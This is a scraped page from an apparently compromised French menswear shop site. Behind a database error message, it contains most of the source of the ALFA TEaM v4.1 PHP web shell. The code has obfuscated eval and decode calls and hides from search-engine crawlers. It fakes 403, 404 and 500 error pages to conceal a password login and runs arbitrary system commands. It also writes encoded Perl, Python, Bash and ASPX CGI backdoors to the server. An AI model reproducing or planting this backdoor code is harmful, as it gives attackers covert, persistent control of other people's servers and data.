Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sfaxannu/www/leftnew2644.php on line 38
EXIST
";
}
echo "
EXIST
Mode et vêtements :   Prêt à Porter pour Homme

/*
    Author:     Solevisible/Alfa-Team
    Telegram:     https://telegram.me/solevisible
    YouTube:     https://youtube.com/solevisible
    Gmail:        solevisible@gmail.com
    Date:        Monday, September 14, 2020
*/
$GLOBALS['oZgNypoPRU'] = array(
    'username' => 'alfa',
    'password' => 'a6f452ec3293d7fb72c5b677257b20ec',//md5(ehsan)
    'safe_mode' => '0',
    'login_page' => '403',
    'show_icons' => '1',
    'post_encryption' => false,
    'cgi_api' => true,
);

$CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's';
$aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . '';
$OVpGNqqFZs = 'e' . 'v' . 'al';
$psDEwGhsxg = 'gz' . 'inf' . 'late';

if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''))
{
    function vcnvSCZgBz($data)
    {
        if (empty($data)) return;
        $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
        $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
        $ac = 0;
        $enc = '';
        $tmp_arr = array();
        if (!$data)
        {
            return $data;
        }
        do
        {
            $o1 = $aztJtafUXm($data, $i++);
            $o2 = $aztJtafUXm($data, $i++);
            $o3 = $aztJtafUXm($data, $i++);
            $bits = $o1 << 16 | $o2 << 8 | $o3;
            $h1 = $bits >> 18 & 0x3f;
            $h2 = $bits >> 12 & 0x3f;
            $h3 = $bits >> 6 & 0x3f;
            $h4 = $bits & 0x3f;
            $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
        }
        while ($i < strlen($data));
        $enc = implode($tmp_arr, '');
        $r = (strlen($data) % 3);
        return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3));
    }
    function charCodeAt($data, $char)
    {
        return ord(substr($data, $char, 1));
    }
    function charAt($data, $char)
    {
        return substr($data, $char, 1);
    }
}
else
{
    function vcnvSCZgBz($s)
    {
        $b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '';
        return $b($s);
    }
}
if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''))
{
    function zRtSHsbTzV($input)
    {
        if (empty($input)) return;
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
        $i = 0;
        $output = "";
        $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
        do
        {
            $enc1 = strpos($keyStr, substr($input, $i++, 1));
            $enc2 = strpos($keyStr, substr($input, $i++, 1));
            $enc3 = strpos($keyStr, substr($input, $i++, 1));
            $enc4 = strpos($keyStr, substr($input, $i++, 1));
            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr((int)$chr1);
            if ($enc3 != 64)
            {
                $output = $output . chr((int)$chr2);
            }
            if ($enc4 != 64)
            {
                $output = $output . chr((int)$chr3);
            }
            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
        }
        while ($i < strlen($input));
        return $output;
    }
}
else
{
    function zRtSHsbTzV($s)
    {
        $b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '';
        return $b($s);
    }
}

function __ZW5jb2Rlcg($s)
{
    return vcnvSCZgBz($s);
}
function __ZGVjb2Rlcg($s)
{
    return zRtSHsbTzV($s);
}

$GLOBALS['DB_NAME'] = $GLOBALS['oZgNypoPRU'];

foreach ($GLOBALS['DB_NAME'] as $key => $value)
{
    $prefix = substr($key, 0, 2);
    if ($prefix == "us")
    {
        $GLOBALS['DB_NAME']["user"] = $value;
        $GLOBALS['DB_NAME']["user_rand"] = $key;
    }
    elseif ($prefix == "pa")
    {
        $GLOBALS['DB_NAME']["pass"] = $value;
        $GLOBALS['DB_NAME']["pass_rand"] = $key;
    }
    elseif ($prefix == "sa")
    {
        $GLOBALS['DB_NAME']["safemode"] = $value;
        $GLOBALS['DB_NAME']["safemode_rand"] = $key;
    }
    elseif ($prefix == "lo")
    {
        $GLOBALS['DB_NAME']["login_page"] = $value;
        $GLOBALS['DB_NAME']["login_page_rand"] = $key;
    }
    elseif ($prefix == "sh")
    {
        $GLOBALS['DB_NAME']["show_icons"] = $value;
        $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
    }
    elseif ($prefix == "po")
    {
        $GLOBALS['DB_NAME']["post_encryption"] = $value;
        $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
    }
    elseif ($prefix == "cg")
    {
        $GLOBALS['DB_NAME']["cgi_api"] = $value;
        $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
    }
}

unset($GLOBALS['oZgNypoPRU']);

if (!isset($_SERVER["HTTP_HOST"])) exit();

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
define("__ALFA_VERSION__", "4.1");
define("__ALFA_UPDATE__", "2");
define("__ALFA_CODE_NAME__", "Tesla");
define("__ALFA_DATA_FOLDER__", "ALFA_DATA");
define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():'');
$GLOBALS['__ALFA_COLOR__'] = array(
        "shell_border" => array(
            "key_color" => "#0E304A",
            "multi_selector" => array(
                ".header" => "border: 7px solid {color}",
                "#meunlist" => "border-color: {color}",
                "#hidden_sh" => "background-color: {color}",
                ".ajaxarea" => "border: 1px solid {color}",
                ".foot" => "border-color: {color}",
            )
        ),
        "header_vars" => "#27979B",
        "header_values" => "#67ABDF",
        "header_on" => "#00FF00",
        "header_off" => "#ff0000",
        "header_none" => "#00FF00",
        "home_shell" => "#ff0000",
        "home_shell:hover" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".home_shell:hover" => "color: {color};",
            )
        ),
        "back_shell" => "#efbe73",
        "back_shell:hover" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".back_shell:hover" => "color: {color};",
            )
        ),
        "header_pwd" => "#00FF00",
        "header_pwd:hover" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".header_pwd:hover" => "color: {color};",
            )
        ),
        "header_drive" => "#00FF00",
        "header_drive:hover" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".header_drive:hover" => "color: {color};",
            )
        ),
        "header_show_all" => "#00FF00",
        "disable_functions" => "#ff0000",
        "footer_text" => "#27979B",
        "menu_options" => "#27979B",
        "menu_options:hover" => array(
            "key_color" => "#646464",
            "multi_selector" => array(
                ".menu_options:hover" => "background-color: {color};font-weight: unset;",
            )
        ),
        "options_list" => array(
            "key_color" => "#00FF00",
            "multi_selector" => array(
                ".content_options_holder .header center a" => "color: {color};",
            )
        ),
        "options_list:hover" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".content_options_holder .header center a:hover" => "color: {color};",
            )
        ),
        "options_list_header" => array(
            "key_color" => "#59cc33",
            "multi_selector" => array(
                ".txtfont_header" => "color: {color};",
            )
        ),
        "options_list_text" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".txtfont,.tbltxt" => "color: {color};",
            )
        ),
        "Alfa+" => array(
            "key_color" => "#06ff0f",
            "multi_selector" => array(
                ".alfa_plus" => "color: {color};font-weight: unset;",
            )
        ),
        "hidden_shell_text" => array(
            "key_color" => "#00FF00",
            "multi_selector" => array(
                "#hidden_sh a" => "color: {color};",
            )
        ),
        "hidden_shell_version" => "#ff0000",
        "shell_name" => "#FF0000",
        "main_row:hover" => array(
            "key_color" => "#646464",
            "multi_selector" => array(
                ".main tr:hover" => "background-color: {color};",
            )
        ),
        "main_header" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".main th" => "color: {color};",
            )
        ),
        "main_name" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".main .main_name" => "color: {color};font-weight: unset;",
            )
        ),
        "main_size" => "#67ABDF",
        "main_modify" => "#67ABDF",
        "main_owner_group" => "#67ABDF",
        "main_green_perm" => "#25ff00",
        "main_red_perm" => "#FF0000",
        "main_white_perm" => "#FFFFFF",
        "beetween_perms" => "#FFFFFF",
        "main_actions" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".main .actions" => "color: {color};",
            )
        ),
        "menu_options:hover" => array(
            "key_color" => "#646464",
            "multi_selector" => array(
                ".menu_options:hover" => "background-color: {color};font-weight: unset;",
            )
        ),
        "minimize_editor_background" => array(
            "key_color" => "#0e304a",
            "multi_selector" => array(
                ".minimized-wrapper" => "background-color: {color};",
            )
        ),
        "minimize_editor_text" => array(
            "key_color" => "#f5deb3",
            "multi_selector" => array(
                ".minimized-text" => "color: {color};",
            )
        ),
        "editor_border" => array(
            "key_color" => "#0e304a",
            "multi_selector" => array(
                ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
            )
        ),
        "editor_background" => array(
            "key_color" => "rgba(0, 1, 23, 0.94)",
            "multi_selector" => array(
                ".editor-explorer,.editor-modal" => "background-color: {color};",
            )
        ),
        "editor_header_background" => array(
            "key_color" => "rgba(21, 66, 88, 0.93)",
            "multi_selector" => array(
                ".editor-header" => "background-color: {color};",
            )
        ),
        "editor_header_text" => array(
            "key_color" => "#00ff7f",
            "multi_selector" => array(
                ".editor-path" => "color: {color};",
            )
        ),
        "editor_header_button" => array(
            "key_color" => "#1d5673",
            "multi_selector" => array(
                ".close-button, .editor-minimize" => "background-color: {color};",
            )
        ),
        "editor_actions" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".editor_actions" => "color: {color};",
            )
        ),
        "editor_file_info_vars" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".editor_file_info_vars" => "color: {color};",
            )
        ),
        "editor_file_info_values" => array(
            "key_color" => "#67ABDF",
            "multi_selector" => array(
                ".filestools" => "color: {color};",
            )
        ),
        "editor_history_header" => array(
            "key_color" => "#14ff07",
            "multi_selector" => array(
                ".hheader-text,.history-clear" => "color: {color};",
            )
        ),
        "editor_history_list" => array(
            "key_color" => "#03b3a3",
            "multi_selector" => array(
                ".editor-file-name" => "color: {color};",
            )
        ),
        "editor_history_selected_file" => array(
            "key_color" => "rgba(49, 55, 93, 0.77)",
            "multi_selector" => array(
                ".is_active" => "background-color: {color};",
            )
        ),
        "editor_history_file:hover" => array(
            "key_color" => "#646464",
            "multi_selector" => array(
                ".file-holder > .history:hover" => "background-color: {color};",
            )
        ),
        "input_box_border" => array(
            "key_color" => "#0E304A",
            "multi_selector" => array(
                "input[type=text],textarea" => "border: 1px solid {color}",
            )
        ),
        "input_box_text" => array(
            "key_color" => "#999999",
            "multi_selector" => array(
                "input[type=text],textarea" => "color: {color};",
            )
        ),
        "input_box:hover" => array(
            "key_color" => "#27979B",
            "multi_selector" => array(
                "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
            )
        ),
        "select_box_border" => array(
            "key_color" => "#0E304A",
            "multi_selector" => array(
                "select" => "border: 1px solid {color}",
            )
        ),
        "select_box_text" => array(
            "key_color" => "#FFFFEE",
            "multi_selector" => array(
                "select" => "color: {color};",
            )
        ),
        "select_box:hover" => array(
            "key_color" => "#27979B",
            "multi_selector" => array(
                "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
            )
        ),
        "button_border" => array(
            "key_color" => "#27979B",
            "multi_selector" => array(
                "input[type=submit],.button,#addup" => "border: 1px solid {color};",
            )
        ),
        "button:hover" => array(
            "key_color" => "#27979B",
            "multi_selector" => array(
                "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
                ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
            )
        ),
        "outputs_text" => array(
            "key_color" => "#67ABDF",
            "multi_selector" => array(
                ".ml1" => "color: {color};",
            )
        ),
        "outputs_border" => array(
            "key_color" => "#0E304A",
            "multi_selector" => array(
                ".ml1" => "border: 1px solid {color};",
            )
        ),
        "uploader_border" => array(
            "key_color" => "#0E304A",
            "multi_selector" => array(
                ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
            )
        ),
        "uploader_background" => array(
            "key_color" => "#0E304A",
            "multi_selector" => array(
                ".inputfile strong" => "background-color: {color};",
            )
        ),
        "uploader_text_right" => array(
            "key_color" => "#FFFFFF",
            "multi_selector" => array(
                ".inputfile strong" => "color: {color};",
            )
        ),
        "uploader_text_left" => array(
            "key_color" => "#25ff00",
            "multi_selector" => array(
                ".inputfile span" => "color: {color};",
            )
        ),
        "uploader:hover" => array(
            "key_color" => "#27979B",
            "multi_selector" => array(
                ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
            )
        ),
        "uploader_progress_bar" => array(
            "key_color" => "#00ff00",
            "multi_selector" => array(
                ".up_bar" => "background-color: {color};",
            )
        ),
        "mysql_tables" => "#00FF00",
        "mysql_table_count" => "#67ABDF",
        "copyright" => "#dfff00",
        "scrollbar" => array(
            "key_color" => "#1e82b5",
            "multi_selector" => array(
                "*::-webkit-scrollbar-thumb" => "background-color: {color};",
            )
        ),
        "scrollbar_background" => array(
            "key_color" => "#000115",
            "multi_selector" => array(
                "*::-webkit-scrollbar-track" => "background-color: {color};",
            )
        ),
);
$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
//@session_start();
@session_write_close();
@ignore_user_abort(true);
@set_time_limit(0);
@ini_set('memory_limit', '-1');
@ini_set("upload_max_filesize", "9999m");
if($config['AlfaProtectShell']){
$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
$Eform='

';
if($config['AlfaLoginPage'] == 'gui'){
if(@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])){
if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo '

~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~

alfa team 2012




~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~







Login:
Password:
 


';
exit;
}
}elseif($config['AlfaLoginPage']=='500'){
if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo '500 Internal Server Error

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

'.$SERVER_SIG.''.$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='403'){
if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo "403 Forbidden

Forbidden

You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.

".$SERVER_SIG."".$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='404'){
if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

".$SERVER_SIG."".$Eform;
exit;
}
}
}
function decrypt_post($str){
    if(__ALFA_POST_ENCRYPTION__){
        $pwd = __ALFA_SECRET_KEY__;
        $pwd     = __ZW5jb2Rlcg($pwd);
        $str     = __ZGVjb2Rlcg($str);
        $enc_chr = "";
        $enc_str = "";
        $i       = 0;
        while ($i < strlen($str)) {
            for ($j = 0; $j < strlen($pwd); $j++) {
                $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
                $enc_str .= $enc_chr;
                $i++;
                if ($i >= strlen($str))
                    break;
            }
        }
        return __ZGVjb2Rlcg($enc_str);
    }else{
        return __ZGVjb2Rlcg($str);
    }
}

function _AlfaSecretKey(){
    $secret = @$_COOKIE["AlfaSecretKey"];
    if(!isset($_COOKIE["AlfaSecretKey"])){
        $secret = uniqid(mt_rand(), true);
        __alfa_set_cookie("AlfaSecretKey", $secret);
    }
    return $secret;
}
function alfa_getColor($target){
    if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
        return $GLOBALS["DB_NAME"]["color"][$target];
    }else{
        $target = $GLOBALS["__ALFA_COLOR__"][$target];
        if(is_array($target)){
            return $target["key_color"];
        }else{
            return $target;
        }
    }
}
function alfaCssLoadColors(){
    $css = "";
    foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
        if(!is_array($value)){
            $value = alfa_getColor($key);
            $css .= ".{$key}{color: {$value};}";
        }else{
            if(isset($value["multi_selector"])){
                foreach($value["multi_selector"] as $k => $v){
                    $color = alfa_getColor($key);
                    $code = str_replace("{color}", $color, $v);
                    $css .=  $k."{".$code."}";
                }
            }
        }
    }
    return $css;
}
if(isset($_POST['ajax'])){
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '';
}}
function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){
    if(!$GLOBALS["DB_NAME"]["cgi_api"]){
        return "";
    }
    if(isset($_COOKIE["alfacgiapi_mode"])){
        return "";
    }
    $cmd_pure = $cmd;
    $is_curl = function_exists('curl_version');
    $is_socket = function_exists('fsockopen');
    if($is_curl||$is_socket){
        $recreate = false;
        if(isset($_COOKIE["alfacgiapi"])){
            if(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){
                $recreate = true;
                $lang = $_COOKIE["alfacgiapi"];
            }
        }
        if(!isset($_COOKIE["alfacgiapi"])||$recreate){
            @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
            $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
            $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
            $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
            $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";
            if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
            if($lang == "aspx"){
                alfaWriteTocgiapi("aspx.aspx",$aspx);
            }else{
                alfaWriteTocgiapi($lang.".alfa",$source);
            }
            alfacgihtaccess('cgi', "alfacgiapi/");
        }else{
            $lang = $_COOKIE["alfacgiapi"];
        }
        $cgi_ext = ".alfa";
        if($lang=="aspx"){
            $cgi_ext = ".aspx";
        }
        $cgi_url = __ALFA_DATA_FOLDER__."/alfacgiapi/".$lang.$cgi_ext;
        $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
        if($is_curl){
            $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
            $post = new AlfaCURL();
            $data = $post->Send($address, "post", $cmd);
        }elseif($is_socket){
            $server = $_SERVER["SERVER_NAME"];
            $uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
            $data = _alfa_fsockopen($server,$uri,$cmd);
        }
        $out = "";
        if(strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]

"+output+"
') === false){
            if($set_cookie){
                __alfa_set_cookie("alfacgiapi", $lang);
            }
            if(@preg_match("/
(.*?)<\/pre>/s", $data, $res)){

                $out = $res[1];

            }

        }elseif($lang=="perl"){

            return _alfa_cgicmd($cmd_pure,"py",$set_cookie);

        }elseif($lang=="py"){

            return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);

        }elseif($lang=="bash" && $GLOBALS['sys']=="win"){

            return _alfa_cgicmd($cmd_pure,"aspx",$set_cookie);

        }else{

            if($set_cookie){

                __alfa_set_cookie("alfacgiapi_mode", "off");

            }

        }

        return trim($out);

    }else{

        return "";

    }

}

function alfaGetCwd(){

    if(function_exists("getcwd")){

        return @getcwd();

    }else{

        return dirname($_SERVER["SCRIPT_FILENAME"]);

    }

}

function alfaEx($in,$re=false,$cgi=true,$all=false){

    $data = _alfa_php_cmd($in,$re);

    if(empty($data)&&$cgi||$all){

        if($GLOBALS['sys']=='unix'){

            if(strlen(_alfa_php_cmd("whoami"))==0||$all){

                $cmd = _alfa_cgicmd($in);

                if(!empty($cmd)){

                    return $cmd;

                }

            }

        }

    }

    return $data;

}

function _alfa_php_cmd($in,$re=false){

$out='';

try{

if($re)$in=$in." 2>&1";

if(function_exists('exec')){

@exec($in,$out);

$out = @join("\n",$out);

}elseif(function_exists('passthru')) {

ob_start();

@passthru($in);

$out = ob_get_clean();

}elseif(function_exists('system')){

ob_start();

@system($in);

$out = ob_get_clean();

} elseif (function_exists('shell_exec')) {

$out = shell_exec($in);

}elseif(function_exists("popen")&&function_exists("pclose")){

if(is_resource($f = @popen($in,"r"))){

$out = "";

while(!@feof($f))

$out .= fread($f,1024);

pclose($f);

}

}elseif(function_exists('proc_open')){

$pipes = array();

$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);

$out=@stream_get_contents($pipes[1]);

}elseif(class_exists('COM')){

$alfaWs = new COM('WScript.shell');

$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);

$stdout = $exec->StdOut();

$out=$stdout->ReadAll();

}

}catch(Exception $e){}

return $out;

}

function _alfa_fsockopen($server,$uri,$post){

    $socket = @fsockopen($server, 80, $errno, $errstr, 15);

    if($socket){

        $http  = "POST {$uri} HTTP/1.0\r\n";

        $http .= "Host: {$server}\r\n";

        $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";

        $http .= "Content-Type: application/x-www-form-urlencoded\r\n";

        $http .= "Content-length: " . strlen($post) . "\r\n";

        $http .= "Connection: close\r\n\r\n";

        $http .= $post . "\r\n\r\n";

        fwrite($socket, $http);

        $contents = "";

        while (!@feof($socket)) {

            $contents .= @fgets($socket, 4096);

        }

        list($header, $body) = explode("\r\n\r\n", $contents, 2);

        @fclose($socket);

        return $body;

    }else{

        return "";

    }

}

if(isset($_GET["solevisible"])){

@error_reporting(E_ALL ^ E_NOTICE);

echo '';

echo "Solevisible Hidden Shell";

echo "";

echo 'Kernel : '.(function_exists('php_uname')?php_uname():'???').'';

$safe_mode = @ini_get('safe_mode');

if($safe_mode){$r = "On";}else{$r = "Off";}

echo "
OS: " . PHP_OS . "
";

echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "
";

echo "PHP Version: " . PHP_VERSION .  "
";

echo "PWD: " . str_replace("\\","/",@alfaGetCwd()) . "/
";

echo "Safe Mode : $r
";

echo"Disable functions : ";

$disfun = @ini_get('disable_functions');

if(empty($disfun)){$disfun = 'NONE';}

echo"";

echo "$disfun";

echo"
";

echo "Your Ip Address is :  " . $_SERVER['REMOTE_ADDR'] . "
";

echo "Server Ip Address is :  ".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."
";

echo '
';

